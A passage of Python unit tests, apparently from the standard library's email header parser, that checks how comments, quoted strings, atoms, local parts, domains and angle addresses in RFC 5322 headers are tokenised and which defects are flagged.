def test_get_comment_multiple_nesting(self):
comment = self._test_get_x(parser.get_comment,
'(((((foo)))))', '(((((foo)))))', ' ', [], '', ['((((foo))))'])
for i in range(4, 0, -1):
self.assertEqual(comment[0].content, '('*(i-1)+'foo'+')'*(i-1))
comment = comment[0]
self.assertEqual(comment.content, 'foo')
def test_get_comment_missing_end_of_nesting(self):
self._test_get_x(parser.get_comment,
'(((((foo)))', '(((((foo)))))', ' ',
[errors.InvalidHeaderDefect]*2, '', ['((((foo))))'])
def test_get_comment_qs_in_nested_comment(self):
comment = self._test_get_x(parser.get_comment,
'(foo (b\)))', '(foo (b\)))', ' ', [], '', ['foo (b\))'])
self.assertEqual(comment[2].content, 'b)')
# get_cfws
def test_get_cfws_only_ws(self):
cfws = self._test_get_x(parser.get_cfws,
' \t \t', ' \t \t', ' ', [], '', [])
self.assertEqual(cfws.token_type, 'cfws')
def test_get_cfws_only_comment(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo)', '(foo)', ' ', [], '', ['foo'])
self.assertEqual(cfws[0].content, 'foo')
def test_get_cfws_only_mixed(self):
cfws = self._test_get_x(parser.get_cfws,
' (foo ) ( bar) ', ' (foo ) ( bar) ', ' ', [], '',
['foo ', ' bar'])
self.assertEqual(cfws[1].content, 'foo ')
self.assertEqual(cfws[3].content, ' bar')
def test_get_cfws_ends_at_non_leader(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo) bar', '(foo) ', ' ', [], 'bar', ['foo'])
self.assertEqual(cfws[0].content, 'foo')
def test_get_cfws_ends_at_non_printable(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo) \x07', '(foo) ', ' ', [], '\x07', ['foo'])
self.assertEqual(cfws[0].content, 'foo')
def test_get_cfws_non_printable_in_comment(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo \x07) "test"', '(foo \x07) ', ' ',
[errors.NonPrintableDefect], '"test"', ['foo \x07'])
self.assertEqual(cfws[0].content, 'foo \x07')
def test_get_cfws_header_ends_in_comment(self):
cfws = self._test_get_x(parser.get_cfws,
' (foo ', ' (foo )', ' ',
[errors.InvalidHeaderDefect], '', ['foo '])
self.assertEqual(cfws[1].content, 'foo ')
def test_get_cfws_multiple_nested_comments(self):
cfws = self._test_get_x(parser.get_cfws,
'(foo (bar)) ((a)(a))', '(foo (bar)) ((a)(a))', ' ', [],
'', ['foo (bar)', '(a)(a)'])
self.assertEqual(cfws[0].comments, ['foo (bar)'])
self.assertEqual(cfws[2].comments, ['(a)(a)'])
# get_quoted_string
def test_get_quoted_string_only(self):
qs = self._test_get_x(parser.get_quoted_string,
'"bob"', '"bob"', 'bob', [], '')
self.assertEqual(qs.token_type, 'quoted-string')
self.assertEqual(qs.quoted_value, '"bob"')
self.assertEqual(qs.content, 'bob')
def test_get_quoted_string_with_wsp(self):
qs = self._test_get_x(parser.get_quoted_string,
'\t "bob" ', '\t "bob" ', ' bob ', [], '')
self.assertEqual(qs.quoted_value, ' "bob" ')
self.assertEqual(qs.content, 'bob')
def test_get_quoted_string_with_comments_and_wsp(self):
qs = self._test_get_x(parser.get_quoted_string,
' (foo) "bob"(bar)', ' (foo) "bob"(bar)', ' bob ', [], '')
self.assertEqual(qs[0][1].content, 'foo')
self.assertEqual(qs[2][0].content, 'bar')
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
def test_get_quoted_string_with_multiple_comments(self):
qs = self._test_get_x(parser.get_quoted_string,
' (foo) (bar) "bob"(bird)', ' (foo) (bar) "bob"(bird)', ' bob ',
[], '')
self.assertEqual(qs[0].comments, ['foo', 'bar'])
self.assertEqual(qs[2].comments, ['bird'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
def test_get_quoted_string_non_printable_in_comment(self):
qs = self._test_get_x(parser.get_quoted_string,
' (\x0A) "bob"', ' (\x0A) "bob"', ' bob',
[errors.NonPrintableDefect], '')
self.assertEqual(qs[0].comments, ['\x0A'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob"')
def test_get_quoted_string_non_printable_in_qcontent(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "a\x0B"', ' (a) "a\x0B"', ' a\x0B',
[errors.NonPrintableDefect], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs.content, 'a\x0B')
self.assertEqual(qs.quoted_value, ' "a\x0B"')
def test_get_quoted_string_internal_ws(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "foo bar "', ' (a) "foo bar "', ' foo bar ',
[], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs.content, 'foo bar ')
self.assertEqual(qs.quoted_value, ' "foo bar "')
def test_get_quoted_string_header_ends_in_comment(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "bob" (a', ' (a) "bob" (a)', ' bob ',
[errors.InvalidHeaderDefect], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs[2].comments, ['a'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
def test_get_quoted_string_header_ends_in_qcontent(self):
qs = self._test_get_x(parser.get_quoted_string,
' (a) "bob', ' (a) "bob"', ' bob',
[errors.InvalidHeaderDefect], '')
self.assertEqual(qs[0].comments, ['a'])
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob"')
def test_get_quoted_string_no_quoted_string(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_quoted_string(' (ab) xyz')
def test_get_quoted_string_qs_ends_at_noncfws(self):
qs = self._test_get_x(parser.get_quoted_string,
'\t "bob" fee', '\t "bob" ', ' bob ', [], 'fee')
self.assertEqual(qs.content, 'bob')
self.assertEqual(qs.quoted_value, ' "bob" ')
# get_atom
def test_get_atom_only(self):
atom = self._test_get_x(parser.get_atom,
'bob', 'bob', 'bob', [], '')
self.assertEqual(atom.token_type, 'atom')
def test_get_atom_with_wsp(self):
self._test_get_x(parser.get_atom,
'\t bob ', '\t bob ', ' bob ', [], '')
def test_get_atom_with_comments_and_wsp(self):
atom = self._test_get_x(parser.get_atom,
' (foo) bob(bar)', ' (foo) bob(bar)', ' bob ', [], '')
self.assertEqual(atom[0][1].content, 'foo')
self.assertEqual(atom[2][0].content, 'bar')
def test_get_atom_with_multiple_comments(self):
atom = self._test_get_x(parser.get_atom,
' (foo) (bar) bob(bird)', ' (foo) (bar) bob(bird)', ' bob ',
[], '')
self.assertEqual(atom[0].comments, ['foo', 'bar'])
self.assertEqual(atom[2].comments, ['bird'])
def test_get_atom_non_printable_in_comment(self):
atom = self._test_get_x(parser.get_atom,
' (\x0A) bob', ' (\x0A) bob', ' bob',
[errors.NonPrintableDefect], '')
self.assertEqual(atom[0].comments, ['\x0A'])
def test_get_atom_non_printable_in_atext(self):
atom = self._test_get_x(parser.get_atom,
' (a) a\x0B', ' (a) a\x0B', ' a\x0B',
[errors.NonPrintableDefect], '')
self.assertEqual(atom[0].comments, ['a'])
def test_get_atom_header_ends_in_comment(self):
atom = self._test_get_x(parser.get_atom,
' (a) bob (a', ' (a) bob (a)', ' bob ',
[errors.InvalidHeaderDefect], '')
self.assertEqual(atom[0].comments, ['a'])
self.assertEqual(atom[2].comments, ['a'])
def test_get_atom_no_atom(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_atom(' (ab) ')
def test_get_atom_no_atom_before_special(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_atom(' (ab) @')
def test_get_atom_atom_ends_at_special(self):
atom = self._test_get_x(parser.get_atom,
' (foo) bob(bar) @bang', ' (foo) bob(bar) ', ' bob ', [], '@bang')
self.assertEqual(atom[0].comments, ['foo'])
self.assertEqual(atom[2].comments, ['bar'])
def test_get_atom_atom_ends_at_noncfws(self):
self._test_get_x(parser.get_atom,
'bob fred', 'bob ', 'bob ', [], 'fred')
def test_get_atom_rfc2047_atom(self):
self._test_get_x(parser.get_atom,
'=?utf-8?q?=20bob?=', ' bob', ' bob', [], '')
# get_dot_atom_text
def test_get_dot_atom_text(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo.bar.bang', 'foo.bar.bang', 'foo.bar.bang', [], '')
self.assertEqual(dot_atom_text.token_type, 'dot-atom-text')
self.assertEqual(len(dot_atom_text), 5)
def test_get_dot_atom_text_lone_atom_is_valid(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo', 'foo', 'foo', [], '')
def test_get_dot_atom_text_raises_on_leading_dot(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('.foo.bar')
def test_get_dot_atom_text_raises_on_trailing_dot(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('foo.bar.')
def test_get_dot_atom_text_raises_on_leading_non_atext(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text(' foo.bar')
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('@foo.bar')
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom_text('"foo.bar"')
def test_get_dot_atom_text_trailing_text_preserved(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo@bar', 'foo', 'foo', [], '@bar')
def test_get_dot_atom_text_trailing_ws_preserved(self):
dot_atom_text = self._test_get_x(parser.get_dot_atom_text,
'foo .bar', 'foo', 'foo', [], ' .bar')
# get_dot_atom
def test_get_dot_atom_only(self):
dot_atom = self._test_get_x(parser.get_dot_atom,
'foo.bar.bing', 'foo.bar.bing', 'foo.bar.bing', [], '')
self.assertEqual(dot_atom.token_type, 'dot-atom')
self.assertEqual(len(dot_atom), 1)
def test_get_dot_atom_with_wsp(self):
self._test_get_x(parser.get_dot_atom,
'\t foo.bar.bing ', '\t foo.bar.bing ', ' foo.bar.bing ', [], '')
def test_get_dot_atom_with_comments_and_wsp(self):
self._test_get_x(parser.get_dot_atom,
' (sing) foo.bar.bing (here) ', ' (sing) foo.bar.bing (here) ',
' foo.bar.bing ', [], '')
def test_get_dot_atom_space_ends_dot_atom(self):
self._test_get_x(parser.get_dot_atom,
' (sing) foo.bar .bing (here) ', ' (sing) foo.bar ',
' foo.bar ', [], '.bing (here) ')
def test_get_dot_atom_no_atom_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom(' (foo) ')
def test_get_dot_atom_leading_dot_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom(' (foo) .bar')
def test_get_dot_atom_two_dots_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom('bar..bang')
def test_get_dot_atom_trailing_dot_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_dot_atom(' (foo) bar.bang. foo')
def test_get_dot_atom_rfc2047_atom(self):
self._test_get_x(parser.get_dot_atom,
'=?utf-8?q?=20bob?=', ' bob', ' bob', [], '')
# get_word (if this were black box we'd repeat all the qs/atom tests)
def test_get_word_atom_yields_atom(self):
word = self._test_get_x(parser.get_word,
' (foo) bar (bang) :ah', ' (foo) bar (bang) ', ' bar ', [], ':ah')
self.assertEqual(word.token_type, 'atom')
self.assertEqual(word[0].token_type, 'cfws')
def test_get_word_qs_yields_qs(self):
word = self._test_get_x(parser.get_word,
'"bar " (bang) ah', '"bar " (bang) ', 'bar ', [], 'ah')
self.assertEqual(word.token_type, 'quoted-string')
self.assertEqual(word[0].token_type, 'bare-quoted-string')
self.assertEqual(word[0].value, 'bar ')
self.assertEqual(word.content, 'bar ')
def test_get_word_ends_at_dot(self):
self._test_get_x(parser.get_word,
'foo.', 'foo', 'foo', [], '.')
# get_phrase
def test_get_phrase_simple(self):
phrase = self._test_get_x(parser.get_phrase,
'"Fred A. Johnson" is his name, oh.',
'"Fred A. Johnson" is his name',
'Fred A. Johnson is his name',
[],
', oh.')
self.assertEqual(phrase.token_type, 'phrase')
def test_get_phrase_complex(self):
phrase = self._test_get_x(parser.get_phrase,
' (A) bird (in (my|your)) "hand " is messy\t<>\t',
' (A) bird (in (my|your)) "hand " is messy\t',
' bird hand is messy ',
[],
'<>\t')
self.assertEqual(phrase[0][0].comments, ['A'])
self.assertEqual(phrase[0][2].comments, ['in (my|your)'])
def test_get_phrase_obsolete(self):
phrase = self._test_get_x(parser.get_phrase,
'Fred A.(weird).O Johnson',
'Fred A.(weird).O Johnson',
'Fred A. .O Johnson',
[errors.ObsoleteHeaderDefect]*3,
'')
self.assertEqual(len(phrase), 7)
self.assertEqual(phrase[3].comments, ['weird'])
def test_get_phrase_pharse_must_start_with_word(self):
phrase = self._test_get_x(parser.get_phrase,
'(even weirder).name',
'(even weirder).name',
' .name',
[errors.InvalidHeaderDefect] + [errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(len(phrase), 3)
self.assertEqual(phrase[0].comments, ['even weirder'])
def test_get_phrase_ending_with_obsolete(self):
phrase = self._test_get_x(parser.get_phrase,
'simple phrase.(with trailing comment):boo',
'simple phrase.(with trailing comment)',
'simple phrase. ',
[errors.ObsoleteHeaderDefect]*2,
':boo')
self.assertEqual(len(phrase), 4)
self.assertEqual(phrase[3].comments, ['with trailing comment'])
def get_phrase_cfws_only_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_phrase(' (foo) ')
# get_local_part
def test_get_local_part_simple(self):
local_part = self._test_get_x(parser.get_local_part,
'dinsdale@python.org', 'dinsdale', 'dinsdale', [], '@python.org')
self.assertEqual(local_part.token_type, 'local-part')
self.assertEqual(local_part.local_part, 'dinsdale')
def test_get_local_part_with_dot(self):
local_part = self._test_get_x(parser.get_local_part,
'Fred.A.Johnson@python.org',
'Fred.A.Johnson',
'Fred.A.Johnson',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_with_whitespace(self):
local_part = self._test_get_x(parser.get_local_part,
' Fred.A.Johnson @python.org',
' Fred.A.Johnson ',
' Fred.A.Johnson ',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_with_cfws(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo) Fred.A.Johnson (bar (bird)) @python.org',
' (foo) Fred.A.Johnson (bar (bird)) ',
' Fred.A.Johnson ',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
self.assertEqual(local_part[0][0].comments, ['foo'])
self.assertEqual(local_part[0][2].comments, ['bar (bird)'])
def test_get_local_part_simple_quoted(self):
local_part = self._test_get_x(parser.get_local_part,
'"dinsdale"@python.org', '"dinsdale"', '"dinsdale"', [], '@python.org')
self.assertEqual(local_part.token_type, 'local-part')
self.assertEqual(local_part.local_part, 'dinsdale')
def test_get_local_part_with_quoted_dot(self):
local_part = self._test_get_x(parser.get_local_part,
'"Fred.A.Johnson"@python.org',
'"Fred.A.Johnson"',
'"Fred.A.Johnson"',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_quoted_with_whitespace(self):
local_part = self._test_get_x(parser.get_local_part,
' "Fred A. Johnson" @python.org',
' "Fred A. Johnson" ',
' "Fred A. Johnson" ',
[],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred A. Johnson')
def test_get_local_part_quoted_with_cfws(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo) " Fred A. Johnson " (bar (bird)) @python.org',
' (foo) " Fred A. Johnson " (bar (bird)) ',
' " Fred A. Johnson " ',
[],
'@python.org')
self.assertEqual(local_part.local_part, ' Fred A. Johnson ')
self.assertEqual(local_part[0][0].comments, ['foo'])
self.assertEqual(local_part[0][2].comments, ['bar (bird)'])
def test_get_local_part_simple_obsolete(self):
local_part = self._test_get_x(parser.get_local_part,
'Fred. A.Johnson@python.org',
'Fred. A.Johnson',
'Fred. A.Johnson',
[errors.ObsoleteHeaderDefect],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_complex_obsolete_1(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo )Fred (bar).(bird) A.(sheep)Johnson."and dogs "@python.org',
' (foo )Fred (bar).(bird) A.(sheep)Johnson."and dogs "',
' Fred . A. Johnson.and dogs ',
[errors.ObsoleteHeaderDefect],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson.and dogs ')
def test_get_local_part_complex_obsolete_invalid(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo )Fred (bar).(bird) A.(sheep)Johnson "and dogs"@python.org',
' (foo )Fred (bar).(bird) A.(sheep)Johnson "and dogs"',
' Fred . A. Johnson and dogs',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson and dogs')
def test_get_local_part_no_part_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_local_part(' (foo) ')
def test_get_local_part_special_instead_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_local_part(' (foo) @python.org')
def test_get_local_part_trailing_dot(self):
local_part = self._test_get_x(parser.get_local_part,
' borris.@python.org',
' borris.',
' borris.',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'borris.')
def test_get_local_part_trailing_dot_with_ws(self):
local_part = self._test_get_x(parser.get_local_part,
' borris. @python.org',
' borris. ',
' borris. ',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'borris.')
def test_get_local_part_leading_dot(self):
local_part = self._test_get_x(parser.get_local_part,
'.borris@python.org',
'.borris',
'.borris',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, '.borris')
def test_get_local_part_leading_dot_after_ws(self):
local_part = self._test_get_x(parser.get_local_part,
' .borris@python.org',
' .borris',
' .borris',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, '.borris')
def test_get_local_part_double_dot_raises(self):
local_part = self._test_get_x(parser.get_local_part,
' borris.(foo).natasha@python.org',
' borris.(foo).natasha',
' borris. .natasha',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'borris..natasha')
def test_get_local_part_quoted_strings_in_atom_list(self):
local_part = self._test_get_x(parser.get_local_part,
'""example" example"@example.com',
'""example" example"',
'example example',
[errors.InvalidHeaderDefect]*3,
'@example.com')
self.assertEqual(local_part.local_part, 'example example')
def test_get_local_part_valid_and_invalid_qp_in_atom_list(self):
local_part = self._test_get_x(parser.get_local_part,
r'"\\"example\\" example"@example.com',
r'"\\"example\\" example"',
r'\example\\ example',
[errors.InvalidHeaderDefect]*5,
'@example.com')
self.assertEqual(local_part.local_part, r'\example\\ example')
def test_get_local_part_unicode_defect(self):
# Currently this only happens when parsing unicode, not when parsing
# stuff that was originally binary.
local_part = self._test_get_x(parser.get_local_part,
'exámple@example.com',
'exámple',
'exámple',
[errors.NonASCIILocalPartDefect],
'@example.com')
self.assertEqual(local_part.local_part, 'exámple')
# get_dtext
def test_get_dtext_only(self):
dtext = self._test_get_x(parser.get_dtext,
'foobar', 'foobar', 'foobar', [], '')
self.assertEqual(dtext.token_type, 'ptext')
def test_get_dtext_all_dtext(self):
dtext = self._test_get_x(parser.get_dtext, self.rfc_dtext_chars,
self.rfc_dtext_chars,
self.rfc_dtext_chars, [], '')
def test_get_dtext_two_words_gets_first(self):
self._test_get_x(parser.get_dtext,
'foo bar', 'foo', 'foo', [], ' bar')
def test_get_dtext_following_wsp_preserved(self):
self._test_get_x(parser.get_dtext,
'foo \t\tbar', 'foo', 'foo', [], ' \t\tbar')
def test_get_dtext_non_printables(self):
dtext = self._test_get_x(parser.get_dtext,
'foo\x00bar]', 'foo\x00bar', 'foo\x00bar',
[errors.NonPrintableDefect], ']')
self.assertEqual(dtext.defects[0].non_printables[0], '\x00')
def test_get_dtext_with_qp(self):
ptext = self._test_get_x(parser.get_dtext,
r'foo\]\[\\bar\b\e\l\l',
r'foo][\barbell',
r'foo][\barbell',
[errors.ObsoleteHeaderDefect],
'')
def test_get_dtext_up_to_close_bracket_only(self):
self._test_get_x(parser.get_dtext,
'foo]', 'foo', 'foo', [], ']')
def test_get_dtext_wsp_before_close_bracket_preserved(self):
self._test_get_x(parser.get_dtext,
'foo ]', 'foo', 'foo', [], ' ]')
def test_get_dtext_close_bracket_mid_word(self):
self._test_get_x(parser.get_dtext,
'foo]bar', 'foo', 'foo', [], ']bar')
def test_get_dtext_up_to_open_bracket_only(self):
self._test_get_x(parser.get_dtext,
'foo[', 'foo', 'foo', [], '[')
def test_get_dtext_wsp_before_open_bracket_preserved(self):
self._test_get_x(parser.get_dtext,
'foo [', 'foo', 'foo', [], ' [')
def test_get_dtext_open_bracket_mid_word(self):
self._test_get_x(parser.get_dtext,
'foo[bar', 'foo', 'foo', [], '[bar')
# get_domain_literal
def test_get_domain_literal_only(self):
domain_literal = domain_literal = self._test_get_x(parser.get_domain_literal,
'[127.0.0.1]',
'[127.0.0.1]',
'[127.0.0.1]',
[],
'')
self.assertEqual(domain_literal.token_type, 'domain-literal')
self.assertEqual(domain_literal.domain, '[127.0.0.1]')
self.assertEqual(domain_literal.ip, '127.0.0.1')
def test_get_domain_literal_with_internal_ws(self):
domain_literal = self._test_get_x(parser.get_domain_literal,
'[ 127.0.0.1\t ]',
'[ 127.0.0.1\t ]',
'[ 127.0.0.1 ]',
[],
'')
self.assertEqual(domain_literal.domain, '[127.0.0.1]')
self.assertEqual(domain_literal.ip, '127.0.0.1')
def test_get_domain_literal_with_surrounding_cfws(self):
domain_literal = self._test_get_x(parser.get_domain_literal,
'(foo)[ 127.0.0.1] (bar)',
'(foo)[ 127.0.0.1] (bar)',
' [ 127.0.0.1] ',
[],
'')
self.assertEqual(domain_literal.domain, '[127.0.0.1]')
self.assertEqual(domain_literal.ip, '127.0.0.1')
def test_get_domain_literal_no_start_char_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain_literal('(foo) ')
def test_get_domain_literal_no_start_char_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain_literal('(foo) @')
def test_get_domain_literal_bad_dtext_char_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain_literal('(foo) [abc[@')
# get_domain
def test_get_domain_regular_domain_only(self):
domain = self._test_get_x(parser.get_domain,
'example.com',
'example.com',
'example.com',
[],
'')
self.assertEqual(domain.token_type, 'domain')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_domain_literal_only(self):
domain = self._test_get_x(parser.get_domain,
'[127.0.0.1]',
'[127.0.0.1]',
'[127.0.0.1]',
[],
'')
self.assertEqual(domain.token_type, 'domain')
self.assertEqual(domain.domain, '[127.0.0.1]')
def test_get_domain_with_cfws(self):
domain = self._test_get_x(parser.get_domain,
'(foo) example.com(bar)\t',
'(foo) example.com(bar)\t',
' example.com ',
[],
'')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_domain_literal_with_cfws(self):
domain = self._test_get_x(parser.get_domain,
'(foo)[127.0.0.1]\t(bar)',
'(foo)[127.0.0.1]\t(bar)',
' [127.0.0.1] ',
[],
'')
self.assertEqual(domain.domain, '[127.0.0.1]')
def test_get_domain_domain_with_cfws_ends_at_special(self):
domain = self._test_get_x(parser.get_domain,
'(foo)example.com\t(bar), next',
'(foo)example.com\t(bar)',
' example.com ',
[],
', next')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_domain_literal_with_cfws_ends_at_special(self):
domain = self._test_get_x(parser.get_domain,
'(foo)[127.0.0.1]\t(bar), next',
'(foo)[127.0.0.1]\t(bar)',
' [127.0.0.1] ',
[],
', next')
self.assertEqual(domain.domain, '[127.0.0.1]')
def test_get_domain_obsolete(self):
domain = self._test_get_x(parser.get_domain,
'(foo) example . (bird)com(bar)\t',
'(foo) example . (bird)com(bar)\t',
' example . com ',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_no_non_cfws_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain(" (foo)\t")
def test_get_domain_no_atom_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain(" (foo)\t, broken")
# get_addr_spec
def test_get_addr_spec_normal(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(addr_spec.token_type, 'addr-spec')
self.assertEqual(addr_spec.local_part, 'dinsdale')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, 'dinsdale@example.com')
def test_get_addr_spec_with_doamin_literal(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'dinsdale@[127.0.0.1]',
'dinsdale@[127.0.0.1]',
'dinsdale@[127.0.0.1]',
[],
'')
self.assertEqual(addr_spec.local_part, 'dinsdale')
self.assertEqual(addr_spec.domain, '[127.0.0.1]')
self.assertEqual(addr_spec.addr_spec, 'dinsdale@[127.0.0.1]')
def test_get_addr_spec_with_cfws(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'(foo) dinsdale(bar)@ (bird) example.com (bog)',
'(foo) dinsdale(bar)@ (bird) example.com (bog)',
' dinsdale@example.com ',
[],
'')
self.assertEqual(addr_spec.local_part, 'dinsdale')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, 'dinsdale@example.com')
def test_get_addr_spec_with_qouoted_string_and_cfws(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'(foo) "roy a bug"(bar)@ (bird) example.com (bog)',
'(foo) "roy a bug"(bar)@ (bird) example.com (bog)',
' "roy a bug"@example.com ',
[],
'')
self.assertEqual(addr_spec.local_part, 'roy a bug')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, '"roy a bug"@example.com')
def test_get_addr_spec_ends_at_special(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'(foo) "roy a bug"(bar)@ (bird) example.com (bog) , next',
'(foo) "roy a bug"(bar)@ (bird) example.com (bog) ',
' "roy a bug"@example.com ',
[],
', next')
self.assertEqual(addr_spec.local_part, 'roy a bug')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, '"roy a bug"@example.com')
def test_get_addr_spec_quoted_strings_in_atom_list(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'""example" example"@example.com',
'""example" example"@example.com',
'example example@example.com',
[errors.InvalidHeaderDefect]*3,
'')
self.assertEqual(addr_spec.local_part, 'example example')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, '"example example"@example.com')
def test_get_addr_spec_dot_atom(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'star.a.star@example.com',
'star.a.star@example.com',
'star.a.star@example.com',
[],
'')
self.assertEqual(addr_spec.local_part, 'star.a.star')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, 'star.a.star@example.com')
# get_obs_route
def test_get_obs_route_simple(self):
obs_route = self._test_get_x(parser.get_obs_route,
'@example.com, @two.example.com:',
'@example.com, @two.example.com:',
'@example.com, @two.example.com:',
[],
'')
self.assertEqual(obs_route.token_type, 'obs-route')
self.assertEqual(obs_route.domains, ['example.com', 'two.example.com'])
def test_get_obs_route_complex(self):
obs_route = self._test_get_x(parser.get_obs_route,
'(foo),, (blue)@example.com (bar),@two.(foo) example.com (bird):',
'(foo),, (blue)@example.com (bar),@two.(foo) example.com (bird):',
' ,, @example.com ,@two. example.com :',
[errors.ObsoleteHeaderDefect], # This is the obs-domain
'')
self.assertEqual(obs_route.token_type, 'obs-route')
self.assertEqual(obs_route.domains, ['example.com', 'two.example.com'])
def test_get_obs_route_no_route_before_end_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_obs_route('(foo) @example.com,')
def test_get_obs_route_no_route_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_obs_route('(foo) [abc],')
def test_get_obs_route_no_route_before_special_raises2(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_obs_route('(foo) @example.com [abc],')
# get_angle_addr
def test_get_angle_addr_simple(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com>',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[],
'')
self.assertEqual(angle_addr.token_type, 'angle-addr')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_empty(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<>',
'<>',
'<>',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(angle_addr.token_type, 'angle-addr')
self.assertIsNone(angle_addr.local_part)
self.assertIsNone(angle_addr.domain)
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, '<>')
def test_get_angle_addr_with_cfws(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
' (foo) <dinsdale@example.com>(bar)',
' (foo) <dinsdale@example.com>(bar)',
' <dinsdale@example.com> ',
[],
'')
self.assertEqual(angle_addr.token_type, 'angle-addr')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_qs_and_domain_literal(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<"Fred Perfect"@[127.0.0.1]>',
'<"Fred Perfect"@[127.0.0.1]>',
'<"Fred Perfect"@[127.0.0.1]>',
[],
'')
self.assertEqual(angle_addr.local_part, 'Fred Perfect')
self.assertEqual(angle_addr.domain, '[127.0.0.1]')
self.assertIsNone(angle_addr.route)
